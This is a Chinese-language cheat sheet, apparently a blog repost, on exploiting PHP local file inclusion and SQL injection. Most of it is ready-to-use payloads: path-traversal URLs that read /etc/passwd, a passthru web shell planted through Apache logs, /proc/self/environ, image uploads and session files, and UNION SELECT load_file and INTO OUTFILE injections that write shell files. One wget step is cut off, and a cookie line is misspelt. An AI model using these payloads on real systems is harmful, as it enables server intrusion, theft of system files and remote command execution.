文件包含与注入利用总结

1、文件包含利用

 

通过传递本地或者远程的文件(allow_url_fopen开启)作为参数进行利用，可以读取敏感信息、执行命令、GetWebshell.涛涛电脑知识网

 

Type of call:

require($file);

 

Exploit:

 

?file=/etc/passwd

 

Type of call:

require(“includes/”.$file);

 

Exploit:

 

/?file=../../../../../etc/passwd

 

Tpye of calls:

require(“languages/”.$lang.”.php”);

require(“themes/”.$theme.”/config.php”);

 

Exploit:

 

?file=../../../../../etc/passwd%00

 

Type of call:

require(“languages/”.$_COOKIE['lang'].”.php”);

 

Exploit:

javascript:documents.cookie = “lan=../../../../../etc/passwd%00″;

 

2、包含命令执行

 

当能够把这句代码<? passthru($_GET[cmd]) ?> 上传到服务器，然后利用文件包含就可以。

 

利用方式1：将内容插入apache日志里面。

 

请求不存在的页面：=<? passthru(\$_GET[cmd]) ?>

然后按照前面的方式请求：

?file=../../../var/apache/error_log&cmd=ls /etc

?file=../../../var/apache/error_log&cmd=uname -a

如果不知道apache地址，可以利用包含已有的文件报错来爆出当前位置,当然这个也得依靠不同的操作系统，apache默认地址不一样。

另外可以通过枚举进程表来定位apache日志路径。/proc/{PID}/fd/{FD_ID}

代码（略）

pepelux:~$ perl proc.pl page GET

Apache PID: 4191

FD_SIZE: 64

FD: 2

得到PID 和 FD_ID后就可以这么构造。

?file=/proc/4191/fd/2&cmd=uname -a

?x=<? passthru(\$_GET[cmd]) ?>

如果不成功，把<?转为16进制。

不行的话还可以把段字符放在header字段里面，比如说User-Agent、Referer

 

利用方式2：通过环境变量进行插入

/proc/self 指向最后一个PID使用的链接。

/proc/self/environ 是一个已知的路径，但是一般用户没权限读取。

在linux系统中，/proc/self是因为是个能写的环境变量，而且位置是固定的。

利用的话先把利用代码放在User-Agent进行提交，

然后请求：?file=../../../proc/self/environ&cmd=uname -a

没看懂，一般权限应该不行。

 

利用方式3：将代码插入到图片中

讲一句话添加到图片中，然后上传直接利用。

?file=path/avatar.gif&cmd=uname -a

 

利用方式4：将代码插入到session文件中

如果是通过session验证的，并且知道session的字段。

?user=<? passthru($_GET[cmd]) ?>

找session值（浏览器）和文件位置（一般/tmp/session值）。

然后直接包含。

 

利用方式5: 其他文件

其他日志，FTP的话提交用户名为<? passthru($_GET[cmd]) ?>

服务器版本较老的话，可以利用PUT方式提交代码。

 

获取shell:

?file=xxxx&cmd=wget -O shell.php

 

3、注入与文件包含

 

方式1：注入读取关键文件

?id=-1 UNION SELECT 1,2,3,load_file(‘/etc/passwd’);

magic_quotes开启的话

?id=-1 UNION SELECT 1,2,3,load_file(0x2f6574632f706173737764);

 

方式2：先导出然后读取

?id=1 outfile “/tmp/sql.txt”

?id=-1 UNION SELECT 1,2,3,load_file(‘/tmp/sql.txt’);

 

方式3:直接生成一句话

?id=-1 union select 1,load_file(“/etc/passwd”),1 into outfile “/var/www/host.com/www/passwd”

?id=-1 union select 1,”<?phpinfo()?>”,1 into outfile “/var/www/host.com/www/phpinfo.php”

如果目录不能写，可以先导出到tmp

?id=-1 union select 1,”<? passthru($_GET[cmd]) ?>”,1,1 into outfile “/tmp/sql.txt”

?file=../../../tmp/sql.txt&cmd=uname -a

 

补充说明：

1) php5.3.4以后已经修复了%00漏洞。

2) 前段时间select * from kj_tab limit 1 INTO OUTFILE “d:/kj.txt” LINES TERMINATED BY “<?php eval($living)?>”

3) 参考文件中有几个perl写的小工具帮助利用。

4)LFI配合phpinfo获取shell，参见LFI With PHPInfo Assistance.pdf

5)关于包含命令执行中方式2中80sec也有类似的文章。

 

参考文件：

Web vulnerabilities to gain access to the system

 

 

• 没有相关文章